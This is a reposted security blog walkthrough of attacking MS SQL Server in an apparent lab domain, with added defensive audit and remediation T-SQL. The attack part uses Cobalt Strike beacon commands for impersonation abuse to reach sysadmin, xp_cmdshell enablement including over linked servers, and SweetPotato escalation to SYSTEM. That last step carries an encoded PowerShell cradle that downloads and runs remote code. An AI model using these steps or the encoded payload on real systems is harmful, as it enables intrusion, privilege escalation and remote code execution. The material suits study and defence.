MS SQL Server Attack Surface

Posted by admin, 2024-10-07 18:05:37

Introduction

Microsoft SQL Server is a relational database that runs on Windows and is usually deployed to support business functions. Beyond those functions, SQL Server also exposes a very large attack surface: command execution, privilege escalation, lateral movement and persistence.

Main content

PowerUpSQL and SQLRecon are two excellent tools for interacting with SQL Server.

Get-SQLInstanceDomain works by searching Active Directory for SPNs that begin with MSSQL.

The output below shows that SQL-2 is running SQL Server under the mssql_svc domain account.

beacon> powershell-import C:\Tools\PowerUpSQL\PowerUpSQL.ps1
beacon> powershell Get-SQLInstanceDomain

ComputerName     : sql-2.dev.cyberbotic.io
Instance         : sql-2.dev.cyberbotic.io,1433
DomainAccountSid : 1500000521000672332383313895871914512914091400
DomainAccount    : mssql_svc
DomainAccountCn  : MS SQL Service
Service          : MSSQLSvc
Spn              : MSSQLSvc/sql-2.dev.cyberbotic.io:1433
LastLogon        : 8/15/2022 7:55 PM
Description      :

Get-SQLConnectionTest can be used to test whether we are able to connect to the instance.

beacon> powershell Get-SQLConnectionTest -Instance "sql-2.dev.cyberbotic.io,1433" | fl

ComputerName : sql-2.dev.cyberbotic.io
Instance : sql-2.dev.cyberbotic.io,1433
Status : Accessible

Get-SQLServerInfo can be used to gather more information about the instance.

beacon> powershell Get-SQLServerInfo -Instance "sql-2.dev.cyberbotic.io,1433"

ComputerName : sql-2.dev.cyberbotic.io
Instance : SQL-2
DomainName : DEV
ServiceProcessID : 2668
ServiceName : MSSQLSERVER
ServiceAccount : DEV\mssql_svc
AuthenticationMode : Windows Authentication
ForcedEncryption : 0
Clustered : No
SQLServerVersionNumber : 15.0.2000.5
SQLServerMajorVersion : 2019
SQLServerEdition : Standard Edition (64-bit)
SQLServerServicePack : RTM
OSArchitecture : X64
OsVersionNumber : SQL
Currentlogin : DEV\bfarmer
IsSysadmin : No
ActiveSessions : 1

The following one-liner collects this information across every instance that is accessible:

powershell Get-SQLInstanceDomain | Get-SQLConnectionTest | ? { $_.Status -eq "Accessible" } | Get-SQLServerInfo

SQLRecon can tell us what privileges our login has on the instance.

beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m whoami

[+] Logged in as:
DEV\bfarmer

[+] Mapped to the user:
guest

[+] Roles:
User is a member of public role
User is NOT a member of db_owner role
User is NOT a member of db_accessadmin role
User is NOT a member of db_securityadmin role
User is NOT a member of db_ddladmin role
User is NOT a member of db_backupoperator role
User is NOT a member of db_datareader role
User is NOT a member of db_datawriter role
User is NOT a member of db_denydatareader role
User is NOT a member of db_denydatawriter role
User is NOT a member of sysadmin role
User is NOT a member of setupadmin role
User is NOT a member of serveradmin role
User is NOT a member of securityadmin role
User is NOT a member of processadmin role
User is NOT a member of diskadmin role
User is NOT a member of dbcreator role
User is NOT a member of bulkadmin role

MS SQL allows a login to act with the permissions of another login, without knowing that login's password, if impersonation has been granted. Impersonation grants can be found with:

SELECT * FROM sys.server_permissions WHERE permission_name = 'IMPERSONATE';

Then look up the principal IDs returned to get more information:

SELECT name, principal_id, type_desc, is_disabled FROM sys.server_principals;

SQLRecon can also enumerate impersonation on a SQL Server.

beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m impersonate

[+] Enumerating accounts that can be impersonated on sql-2.dev.cyberbotic.io,1433:

name |
-------
DEV\mssql_svc |

Impersonation is used directly with EXECUTE AS:

EXECUTE AS login = 'DEV\mssql_svc'; SELECT SYSTEM_USER;
DEV\mssql_svc

EXECUTE AS login = 'DEV\mssql_svc'; SELECT IS_SRVROLEMEMBER('sysadmin');
1

SQLRecon's -i parameter runs a module while impersonating the given login:

beacon> execute-assembly C:\Tools\SQLRecon\SQLRecon\bin\Release\SQLRecon.exe -a windows -s sql-2.dev.cyberbotic.io,1433 -m iwhoami -i DEV\mssql_svc

[+] Logged in as:
DEV\mssql_svc

[+] Mapped to the user:
dbo

[+] Roles:
User is a member of public role
User is a member of sysadmin role
User is a member of setupadmin role
User is a member of serveradmin role
User is a member of securityadmin role
User is a member of processadmin role
User is a member of diskadmin role
User is a member of dbcreator role
User is a member of bulkadmin role
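
The two catalog queries above can be joined into a single audit of impersonation grants, which is what a DBA or detection engineer would want to run regularly. The following T-SQL is an added example written for this post; it is not code from PowerUpSQL, SQLRecon or the original author. The login names in the REVOKE statement are taken from the output shown in the post and are assumed to be the grant you want removed.

```sql
-- Added example, not from the original post: list every IMPERSONATE grant on
-- the instance, who holds it, and whether the impersonated login is sysadmin.
SELECT
    grantee.name                               AS grantee_login,
    grantee.type_desc                          AS grantee_type,
    target.name                                AS impersonated_login,
    target.is_disabled                         AS target_is_disabled,
    IS_SRVROLEMEMBER('sysadmin', target.name)  AS target_is_sysadmin,  -- 1 = grant is a direct path to sysadmin
    p.state_desc                               AS grant_state
FROM sys.server_permissions AS p
JOIN sys.server_principals AS grantee
    ON grantee.principal_id = p.grantee_principal_id
JOIN sys.server_principals AS target
    ON target.principal_id = p.major_id      -- for class SERVER_PRINCIPAL, major_id is the impersonated login
WHERE p.permission_name = 'IMPERSONATE'
  AND p.class_desc = 'SERVER_PRINCIPAL'
ORDER BY target_is_sysadmin DESC, grantee_login;

-- In the post's scenario this returns one row: DEV\bfarmer may impersonate
-- DEV\mssql_svc, and DEV\mssql_svc is sysadmin (target_is_sysadmin = 1).

-- Remediation: remove that grant (logins taken from the post's output).
REVOKE IMPERSONATE ON LOGIN::[DEV\mssql_svc] FROM [DEV\bfarmer];

-- Detection note: after EXECUTE AS, SYSTEM_USER reports the impersonated
-- login, but ORIGINAL_LOGIN() still reports who actually connected. Audit
-- specifications and DDL/logon triggers should record ORIGINAL_LOGIN().
SELECT SYSTEM_USER AS effective_login, ORIGINAL_LOGIN() AS connecting_login;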

xp_cmdshell can be used to execute operating-system commands on the SQL Server when the login has sysadmin. Invoke-SQLOSCmd in PowerUpSQL wraps this.

beacon> powershell Invoke-SQLOSCmd -Instance "sql-2.dev.cyberbotic.io,1433" -Command "whoami" -RawResults

dev\mssql_svc

Check whether xp_cmdshell is enabled:

SELECT value FROM sys.configurations WHERE name = 'xp_cmdshell';

Re-enable xp_cmdshell:

sp_configure 'Show Advanced Options', 1; RECONFIGURE;
sp_configure 'xp_cmdshell', 1; RECONFIGURE;
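
For the defensive side of the same setting, the following T-SQL is an added example written for this post (not the original author's code). It reports the running state of xp_cmdshell, checks for the proxy credential that would let non-sysadmin logins use it, and applies the hardened configuration, which is the exact inverse of the enablement sequence above. Dropping the proxy account assumes no application depends on it.

```sql
-- Added example, not from the original post: audit the xp_cmdshell surface
-- and return it to its hardened state.

-- 1. Current state. 'value' is the configured value and 'value_in_use' the
--    running value; the two differ until RECONFIGURE has been executed.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'show advanced options');

-- 2. A proxy credential lets logins that are NOT sysadmin call xp_cmdshell
--    once it is enabled, so its existence widens the blast radius.
SELECT name, credential_identity, create_date
FROM sys.credentials
WHERE name = '##xp_cmdshell_proxy_account##';

-- 3. Hardened configuration: disable xp_cmdshell and hide advanced options again.
EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;           RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; RECONFIGURE;

-- 4. Remove the proxy credential if step 2 found one
--    (assumption: nothing legitimate needs it).
EXEC sp_xp_cmdshell_proxy_account NULL;
```

Re-running the first SELECT after step 3 should show value = 0 and value_in_use = 0 for xp_cmdshell; if value_in_use stays at 1, RECONFIGURE did not take effect and the change should be investigated.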

SQL Server supports linked servers, a mechanism for retrieving data from other MS SQL Servers. Linked servers can be enumerated with:

SELECT srvname, srvproduct, rpcout FROM master..sysservers;

Query across a link with OPENQUERY:

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'select @@servername');

Check xp_cmdshell on the linked server:

SELECT * FROM OPENQUERY("sql-1.cyberbotic.io", 'SELECT * FROM sys.configurations WHERE name = ''xp_cmdshell''');

It can be enabled remotely as follows (requires RPC Out on the link):

EXEC('sp_configure ''show advanced options'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
EXEC('sp_configure ''xp_cmdshell'', 1; reconfigure;') AT [sql-1.cyberbotic.io]
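
The master..sysservers query above only shows the link and its rpcout flag; what decides how dangerous a link is, is the credential mapping behind it. The following T-SQL is an added example written for this post (not the original author's or PowerUpSQL's code) that joins sys.servers with sys.linked_logins to show, for every link, whether EXEC ... AT is possible and which identity the remote side sees. The sp_serveroption call at the end uses the server name from the post and assumes that link only needs OPENQUERY-style reads.

```sql
-- Added example, not from the original post: audit linked servers and the
-- credential mappings they carry. A link with 'rpc out' enabled and a fixed
-- remote login that is sysadmin on the other side (like 'sa' in the
-- Get-SQLServerLinkCrawl output) hands that privilege to every local caller
-- covered by the mapping.
SELECT
    s.name                                   AS linked_server,
    s.product,
    s.provider,
    s.data_source,
    s.is_rpc_out_enabled,                    -- 1 = EXEC(...) AT [server] works
    s.is_data_access_enabled,                -- 1 = OPENQUERY works
    COALESCE(lp.name, '<all other logins>')  AS local_login,  -- local_principal_id 0 = catch-all mapping
    ll.uses_self_credential,                 -- 1 = pass through the caller's own Windows identity
    ll.remote_name                           -- fixed remote login used by this mapping, if any
FROM sys.servers AS s
LEFT JOIN sys.linked_logins AS ll
    ON ll.server_id = s.server_id
LEFT JOIN sys.server_principals AS lp
    ON lp.principal_id = ll.local_principal_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;

-- Remediation for a link that only has to serve reads: switch off rpc out so
-- EXEC ... AT can no longer reconfigure the remote instance
-- (server name taken from the post).
EXEC sp_serveroption
    @server   = 'sql-1.cyberbotic.io',
    @optname  = 'rpc out',
    @optvalue = 'false';
```

Rows where remote_name is a sysadmin login and local_login is the catch-all mapping are the ones to fix first: any login that can reach the local instance, including the guest-mapped one from the whoami output earlier, inherits that remote identity.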

Get-SQLServerLinkCrawl follows every link reachable from an instance:

beacon> powershell Get-SQLServerLinkCrawl -Instance "sql-2.dev.cyberbotic.io,1433"

Version     : SQL Server 2019
Instance    : SQL-2
CustomQuery :
Sysadmin    : 1
Path        : {SQL-2}
User        : DEV\bfarmer
Links       : {SQL-1.CYBERBOTIC.IO}

Version     : SQL Server 2019
Instance    : SQL-1
CustomQuery :
Sysadmin    : 1
Path        : {SQL-2, SQL-1.CYBERBOTIC.IO}
User        : sa
Links       :

In this example we are running in the context of the SQL Server service account, which holds SeImpersonatePrivilege. This privilege allows a process to impersonate a client after that client has authenticated to it.

beacon> getuid
[*] You are NT Service\MSSQLSERVER

beacon> execute-assembly C:\Tools\Seatbelt\Seatbelt\bin\Release\Seatbelt.exe TokenPrivileges

====== TokenPrivileges ======

Current Token's Privileges

SeAssignPrimaryTokenPrivilege: DISABLED
SeIncreaseQuotaPrivilege: DISABLED
SeChangeNotifyPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeImpersonatePrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeCreateGlobalPrivilege: SE_PRIVILEGE_ENABLED_BY_DEFAULT, SE_PRIVILEGE_ENABLED
SeIncreaseWorkingSetPrivilege: DISABLED

[*] Completed collection in 0.037 seconds

Because this account is not a local administrator, it cannot simply open a SYSTEM process already running on the host. One method is to coerce a system service into authenticating to a malicious service controlled by the attacker, which then obtains a SYSTEM token. SweetPotato provides this capability; here it uses the print spooler (PrintSpoofer) method and is run via execute-assembly.

beacon> execute-assembly C:\Tools\SweetPotato\bin\Release\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc aQBlAHgAIAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABuAGUAdAAuAHcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AcwBxAGwALQAyAC4AZABlAHYALgBjAHkAYgBlAHIAYgBvAHQAaQBjAC4AaQBvADoAOAAwADgAMAAvAGMAJwApAA=="

SweetPotato by @_EthicalChaos_
Orignal RottenPotato code and exploit by @foxglovesec
Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery
PrintSpoofer discovery and original exploit by @itm4n
EfsRpc built on EfsPotato by @zcgonvh and PetitPotam by @topotam
[+] Attempting NP impersonation using method PrintSpoofer to launch C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[+] Triggering notification on evil PIPE \sql-1/pipe/b888d569-b66e-4280-b8c5-995afbb9b02c
[+] Server connected to our evil RPC pipe
[+] Duplicated impersonation token ready for process creation
[+] Intercepted and authenticated successfully, launching program
[+] Process created, enjoy!

beacon> connect localhost 4444
[+] established link to child beacon: 10.10.120.25

Originally published on the WeChat public account Th0r安全: MS SQL Server攻击面

Reposted by CN-SEC中文网: https://cn-sec.com/archives/1971615.html